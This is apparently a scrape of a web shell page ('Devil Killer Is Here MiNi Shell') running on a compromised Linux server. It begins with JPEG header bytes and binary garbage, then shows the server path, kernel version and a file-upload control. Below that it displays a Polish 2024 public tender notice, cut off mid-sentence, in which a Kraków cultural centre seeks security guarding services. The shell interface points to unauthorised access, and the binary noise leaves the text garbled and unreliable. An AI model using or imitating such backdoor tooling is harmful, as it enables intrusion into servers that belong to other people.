JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240711/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240711/0040759001-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie usługi ochrony osób i mienia w Nowohuckim Centrum Kultury wraz z interwencją zmotoryzowanej grupy interwencyjnej </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Nowohuckie Centrum Kultury</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 001002538</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">al. Jana Pawła II 232</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kraków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">31-913</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL213 - Miasto Kraków</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@nck.krakow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.nck.krakow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - państwowe i samorządowe instytucje kultury</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie usługi ochrony osób i mienia w Nowohuckim Centrum Kultury wraz z interwencją zmotoryzowanej grupy interwencyjnej </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-679fb4a2-d5bc-416f-86c6-afc57915f7bc</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00407590</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-07-11</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00087282/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 świadczenie usług ochrony fizycznej osób i mienia w Nowohuckim Centrum Kultury na okres 24 miesięcy</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-679fb4a2-d5bc-416f-86c6-afc57915f7bc <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-679fb4a2-d5bc-416f-86c6-afc57915f7bc</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Zgodnie z art. 63 ust. 2 ustawy, „w<br/>postępowaniu o udzielenie zamówienia (…) o wartości mniejszej niż progi unijne ofertę, (…), oświadczenie, o którym mowa w art.<br/>125 ust. 1, składa się, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym<br/>lub podpisem osobistym”.<br/>1.1. Forma elektroniczna oznacza opatrzenie dokumentu (pliku) elektronicznego kwalifikowanym podpisem elektronicznym.<br/>1.2. Rygor nieważności opisany w pkt 8.1. SWZ dotyczy zatem przypadków niedochowania formy złożenia następujących<br/>dokumentów:<br/>1) Formularza Oferty i dołączanych do niego innych dokumentów składających się na sensu stricte treść oferty Wykonawcy w tym<br/>Zał. nr 1 A do SWZ.<br/>2) Oświadczeń z art. 125 ust. 1 ustawy, tj. &lt;&lt;oświadczeń o niepodleganiu wykluczeniu, spełnianiu warunków udziału w<br/>postępowaniu lub kryteriów selekcji&gt;&gt;, o których mowa w pkt 6.1.5. SWZ, składanych samodzielnie przez Wykonawców, zgodnie z<br/>pkt 6.1.5. lit. a SWZ.<br/>3) Oświadczeń z art. 125 ust. 1 ustawy składanych – na podstawie art. 125 ust. 5 ustawy – przez podmioty, o których mowa w pkt<br/>6.1.5 lit. b SWZ, tj. podmioty, które nie są Wykonawcami, ale udostępniają Wykonawcy swoje zasoby w celu wykazania spełniania<br/>określonego warunku/ów udziału w postępowaniu.<br/>4) Pełnomocnictw, o których mowa w pkt 6.1.2. lit. b SWZ.<br/>2. Pozostałe dokumenty i oświadczenia, inne niż wymienione w pkt 8.1 SWZ, w tym w szczególności:<br/>2.1. podmiotowe środki dowodowe, o których mowa w pkt 6.2. SWZ, w tym oświadczenie, o którym mowa w pkt 6.1.4. SWZ (tzw.<br/>oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia z art. 117 ust. 4 ustawy)<br/>2.2. dokumenty potwierdzające umocowanie do reprezentowania, o których mowa w pkt 6.1.2. – inne niż pełnomocnictwa, odpisy lub<br/>informacje z Krajowego Rejestru Sądowego, Centralnej Ewidencji Informacji o Działalności Gospodarczej lub innego właściwego<br/>rejestru – a zatem dokumenty potwierdzające umocowanie do reprezentowania odpowiednio:<br/>1) Wykonawcy,<br/>2) Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego,<br/>3) podmiotu udostępniającego zasoby na zasadach określonych w art. 118 ustawy,<br/>4) podwykonawcy niebędącego podmiotem udostępniającym zasoby na takich zasadach – jeżeli dotyczy,<br/>2.3. zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w pkt 6.1.3 SWZ,<br/>1) przedmiotowe środki dowodowe – o ile są wymagane w postępowaniu,<br/>2) inne niż ww. informacje, oświadczenia lub dokumenty,<br/>przekazywane są w formie elektronicznej (opatrzone kwalifikowanym podpisem elektronicznym), lub w postaci elektronicznej<br/>opatrzonej podpisem zaufanym lub podpisem osobistym, a zatem z zachowaniem tej samej formy i postaci co dokumenty<br/>wymienione w pkt 8.1. SWZ, z tą różnicą, iż w przypadku niedochowania formy i/lub postaci przekazania brak jest sankcji<br/>nieważności.<br/>3. W przypadku, gdy odpisy lub informacje z Krajowego Rejestru Sądowego, Centralnej Ewidencji Informacji o Działalności<br/>Gospodarczej lub innego właściwego rejestru, a także inne podmiotowe<br/>i przedmiotowe środki dowodowe, lub inne dokumenty opisane w § 6 ust. 1 rozporządzenia przywołanego w pkt 8.4. SWZ poniżej,<br/>zostały wystawione przez upoważnione podmioty inne niż Wykonawca, Wykonawca wspólnie ubiegający się o udzielenie<br/>zamówienia, podmiot udostępniający zasoby lub podwykonawca, jako dokument elektroniczny - przekazuje się ten dokument. W<br/>przypadku natomiast, gdy ww. kategorie dokumentów zostały wystawione jako dokument w postaci papierowej, przekazuje się<br/>cyfrowe odwzorowanie tego dokumentu opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem<br/>osobistym poświadczające zgodność cyfrowego odwzorowania z dokumentem w postaci papierowej.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-679fb4a2-d5bc-416f-86c6-afc57915f7bc</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Zamawiający wymaga złożenia oferty w postaci katalogu elektronicznego</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Nowohuckie Centrum Kultury z siedzibą w (31-913)<br/>Krakowie, al. Jana Pawła II 232, działając zgodnie z art. 13 ust. 1 i ust. 2 ogólnego rozporządzenia o<br/>ochronie danych osobowych z dnia 27 kwietnia 2016 roku (dalej: Rozporządzenie) informuje, że:<br/>1) administratorem danych osobowych przekazanych przez Wykonawcę w ofercie i we wszelkich<br/>dokumentach składanych w postępowaniu o udzielenie niniejszego postępowania jest Zamawiający –<br/>Nowohuckie Centrum Kultury, al. Jana Pawła II 232, 31-913 Kraków,<br/>2) Inspektor Ochrony Danych – kontakt: e-mail: IODO@NCK.KRAKOW.PL, poczta tradycyjna:<br/>Nowohuckie Centrum Kultury, al. Jana Pawła II 232, 31-913 Kraków<br/>3) Przetwarzanie danych, o których mowa w pkt 1) w celu związanym z niniejszym postępowaniem o<br/>udzielenie zamówienia publicznego następuje na podstawie z art. 6 ust. 1 lit. b i c Rozporządzenia,<br/>4) Odbiorcami danych osobowych będą osoby lub podmioty którym zostanie udostępniona<br/>dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy Prawo zamówień publicznych.<br/>5) ww. dane osobowe będą przechowywane zgodnie z art. 78 ustawy Pzp przez okres 4 lat od dnia<br/>zakończenia postępowania o udzielenie zamówienia<br/>6) Obowiązek podania danych osobowych jest wymogiem ustawowym określonym w przepisach<br/>ustawy pzp, konsekwencje niepodania danych wynikają z ustawy pzp.<br/>7) Wykonawcy mają prawo do żądania od Zamawiającego dostępu do swoich danych osobowych, ich<br/>sprostowania, ograniczenia przetwarzania.<br/>8) W związku z przetwarzaniem danych osobowych przez Administratora przysługuje prawo wniesienia<br/>skargi do organu nadzorczego.<br/>9) Nie przysługuje Pani/Panu:<br/>• w zw. z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych,<br/>• prawo do przenoszenia danych osobowych o którym mowa w art. 20 RODO,<br/>• na podstawie art. 21 RODO prawo sprzeciwu wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DAT.271.16.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 3.2.	Przedmiotem zamówienia są usługi ochrony osób, mienia, obiektu i terenu Nowohuckiego Centrum Kultury, al. Jana Pawła II 232, 31-913 Kraków wraz z interwencją zmotoryzowanej grupy interwencyjnej oraz świadczenie usług dodatkowych opisanych w Zał. nr 5 – wzór umowy wraz z załącznikiem nr 1 do umowy pn. „Opis przedmiotu zamówienia”.<br/>3.3.	W zakres przedmiotu zamówienia wchodzi wykonywanie bezpośredniej ochrony fizycznej przez dwóch kwalifikowanych pracowników ochrony fizycznej na dwóch posterunkach stałych oraz dodatkowo pięciu kwalifikowanych pracowników ochrony fizycznej w trakcie otwarcia galerii autorskich w następujący sposób:<br/><br/>a)	Pierwszy pracownik ochrony - posterunek stały – pełni stały dyżur 24 godz. na dobę, 7 dni w tygodniu, na portierni w budynku C w holu głównym, wydaje klucze pracownikom oraz obsługuje system monitoringu NCK w tym monitoring Galerii Beksińskiego i Galerii Dudy - Gracza w czasie ich zamknięcia, otwiera i zamyka ww. Galerie na wniosek pracowników Zamawiającego (posiadających upoważnienie Dyrekcji NCK) i jest cały czas obecny na terenie Galerii autorskich w czasie udostępnienia ww. pracownikom. Posterunek ten nie może być NIGDY pozostawiony bez obsady (w przypadku konieczności otwarcia Galerii lub wykonania innych zadań/czynności poza posterunkiem, pracownika z posterunku stałego zastąpić go powinien pracownik z posterunku obchodowego).<br/>b)	Drugi pracownik ochrony – posterunek obchodowy, 24 godz. na dobę, 7 dni w tygodniu, – dokonuje:<br/>•	w godz. 7:00 – 22:00 ciągłych obchodów wewnętrznych i zewnętrznych obiektu (zgodnie z rozmieszczonymi przez Wykonawcę punktami kontrolnymi według wskazań pracownika obsługującego system monitoringu NCK).<br/>•	w godz. 22:00 – 7:00 cogodzinnych obchodów wewnętrznych i zewnętrznych obiektu (zgodnie z rozmieszczonymi przez Wykonawcę punktami kontrolnymi według wskazań pracownika Zamawiającego).<br/>c)	Trzeci pracownik ochrony – Galeria Beksińskiego w budynku A: w godzinach 12.30 – 19.30 w dniach: czwartek – niedziela do 31.12.2024r. Od 1.01.2025r. do 5.09.2026: wtorek – środa 9.30 – 16.30, czwartek – niedziela 12.30 – 19.30 wg harmonogramu przekazanego przez Zamawiającego . Posterunek ten nie może być NIGDY pozostawiony bez obsady. Zakres: ochrona obrazów Zdzisława Beksińskiego, przestrzeni galeryjnej. Ochrona obsługuje alarm, otwiera i zamyka galerię oraz odpowiada za całość i pozostaje w ciągłym kontakcie radiowym ze stanowiskiem monitoringu. <br/>d)	Czwarty pracownik ochrony – Galeria Dudy - Gracza w budynku A: w godzinach 12.30 – 19.30 w dniach: czwartek – niedziela do 31.12.2024r. Od 1.01.2025r. do 5.09.2026: wtorek – środa 9.30 – 16.30, czwartek – niedziela 12.30 – 19.30 wg harmonogramu przekazanego przez Zamawiającego . Posterunek ten nie może być NIGDY pozostawiony bez obsady. Zakres: ochrona obrazów Jerzego Dudy – Gracza, przestrzeni galeryjnej. Ochrona obsługuje alarm, otwiera i zamyka galerię oraz odpowiada za całość i pozostaje w ciągłym kontakcie radiowym ze stanowiskiem monitoringu.<br/>e)	Piąty pracownik ochrony – Przestrzeń przed Galeriami Dudy-Gracza i Zdzisława Beksińskiego w godzinach 12.30 – 19.30 w dniach: czwartek – niedziela do 31.12.2024r. Od 1.01.2025r. do 5.09.2026: wtorek – środa 9.30 – 16.30, czwartek – niedziela 12.30 – 19.30 wg harmonogramu przekazanego przez Zamawiającego. Posterunek ten nie może być NIGDY pozostawiony bez obsady. Ochrona obserwuje wchodzące i wychodzące osoby, dba o przestrzeganie regulaminu Galerii autorskich i pozostaje w ciągłym kontakcie radiowym z pracownikami będącymi fizycznie w galeriach i stanowiskiem monitoringu.<br/>f)	Szósty pracownik ochrony – Monitoring Galerii Dudy-Gracza i Galerii Beksińskiego w godzinach 12.30 – 19.30 w dniach: czwartek – niedziela do 31.12.2024r. Od 1.01.2025r. do 5.09.2026: wtorek – środa 9.30 – 16.30, czwartek – niedziela 12.30 – 19.30 wg harmonogramu przekazanego przez Zamawiającego . Posterunek ten nie może być NIGDY pozostawiony bez obsady. Ochrona obsługuje monitoring i pozostaje w ciągłym kontakcie radiowym z pracownikami będącymi fizycznie w galeriach.<br/>g)	Siódmy pracownik ochrony – dokonuje ciągłych obchodów wewnętrznych budynku A w godzinach 13.00 – 19.00 w dniach: czwartek – niedziela do 31.12.2024r. Od 1.01.2025r. do 5.09.2026: wtorek – środa 10.00 – 16.00, czwartek – niedziela 13.00 – 19.00 wg harmonogramu przekazanego przez Zamawiającego . Posterunek ten nie może być NIGDY pozostawiony bez obsady. Ochrona dokonuje obchodów i pozostaje w ciągłym kontakcie radiowym z pracownikami będącymi fizycznie w galeriach i na portierni w budynku C.<br/>h)	obsługa Cracovia Sacra w 2025 i 2026 polegająca na świadczeniu usług ochrony fizycznej osób i mienia w Klasztorach, Opactwach i Zakonach na terenie miasta Krakowa i gminach przyległych. Wydarzenie odbywa się cyklicznie 14 i 15 sierpnia każdego roku, ilość godzin łącznie w okresie obowiązywania umowy tj. od 05.09.2024 do 05.09.2026: 320 rbg. <br/>i)	obsługa wystaw czasowych na Galeriach polegająca na świadczeniu usług ochrony fizycznej osób i mienia na terenie Nowohuckiego Centrum Kultury w Galeriach wystawowych, ilość godzin łącznie w okresie obowiązywania umowy tj. od 05.09.2024 do 05.09.2026: 1100 rbg.<br/>j)	obsługa koncertów plenerowych od 2024 do 2026 – opis usługi: świadczenie usług ochrony fizycznej osób i mienia na terenie zewnętrznym Nowohuckiego Centrum Kultury, ilość godzin łącznie w okresie obowiązywania umowy tj. od 05.09.2024 do 05.09.2026: 100 rbg.<br/>UWAGA ! <br/>Zamawiający zastrzega sobie możliwość zmniejszenia zakresu zamówienia w trakcie trwania Umowy o zakres usług, o których mowa w lit. c), d), e), f), g) a także zmniejszenia ilości rbg lub zaniechania części lub wszystkich usług, o których mowa w lit. h), i), j) w sytuacji zmniejszenia zapotrzebowania Zamawiającego, w tym rezygnacji z organizacji wszystkich lub niektórych wydarzeń, w szczególności z powodu braku dofinansowania przez Organizatora (UMK) ww. wydarzeń<br/>Dodatkowo Zamawiający zastrzega możliwość ograniczenia świadczenia usług ochrony w galeriach autorskich, o których mowa powyżej co najmniej 2 razy w ciągu obowiązywania umowy jednorazowo na okres nie dłuższy niż 2 tygodnie. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79710000-4 - Usługi ochroniarskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-09-05 do 2026-09-05</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze oferty Zamawiający będzie się kierował kryterium<br/>najniższej ceny. 2. Ocenie będą podlegać wyłącznie oferty nie podlegające odrzuceniu. 3. Za<br/>najkorzystniejszą zostanie uznana oferta z najniższą ceną. 4. W sytuacji, gdy Zamawiający nie będzie<br/>mógł dokonać wyboru najkorzystniejszej oferty ze względu na to, że zostały złożone oferty o takiej<br/>samej cenie, wezwie on Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez<br/>Zamawiającego ofert dodatkowych zawierających nową cenę. Wykonawcy, składając oferty<br/>dodatkowe, nie mogą zaoferować cen wyższych niż zaoferowane w uprzednio złożonych przez nich<br/>ofertach. 5. W toku badania i oceny ofert Zamawiający może żądać od Wykonawców wyjaśnień<br/>dotyczących treści złożonych przez nich ofert lub innych składanych dokumentów lub oświadczeń.<br/>Wykonawcy są zobowiązani do przedstawienia wyjaśnień w terminie wskazanym przez<br/>Zamawiającego. 6. Zamawiający̨ wybiera najkorzystniejsza ̨ ofertę ̨ w terminie związanią oferta ̨<br/>określonyḿ w SWZ. 7. Jeżeli̇ termin związanią oferta ̨ upłynie przed wyborem najkorzystniejszej oferty,<br/>Zamawiający̨ wezwie Wykonawcę,̨ któregó oferta otrzymała najwyższą ̨ ocenę,̨ do wyrażenia,̇ w<br/>wyznaczonym przez Zamawiającegǫ terminie, pisemnej zgody na wybóŕ jego oferty. 8. W przypadku<br/>braku zgody, o której́ mowa w ust. 18.7, oferta podlega odrzuceniu, a Zamawiający̨ zwraca się o<br/>wyrażeniė takiej zgody do kolejnego Wykonawcy, któregó oferta została najwyżej̇ oceniona, chyba zė zachodzą ̨ przesłanki do<br/>unieważnieniȧ postepowania.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. W postępowaniu mogą wziąć udział Wykonawcy, którzy – zgodnie z art. 57 pkt 2 ustawy –<br/>spełniają warunki udziału w postępowaniu, dotyczące:<br/>1.1. uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile<br/>wynika to z odrębnych przepisów poprzez wykazanie, że Wykonawca posiada aktualną koncesję<br/>na prowadzenie działalności gospodarczej w zakresie usług ochrony osób i mienia , o której<br/>mowa w ustawie z dnia 22 sierpnia 1997 r. o ochronie osób i mienia<br/>1.2. posiadają pozwolenie radiowe Prezesa Urzędu Komunikacji Elektronicznej na używanie<br/>radiowych urządzeń nadawczych lub nadawczo – odbiorczych pracujących w służbie<br/>radiokomunikacji lądowej lub typu dyspozytorskiego obejmujące swym 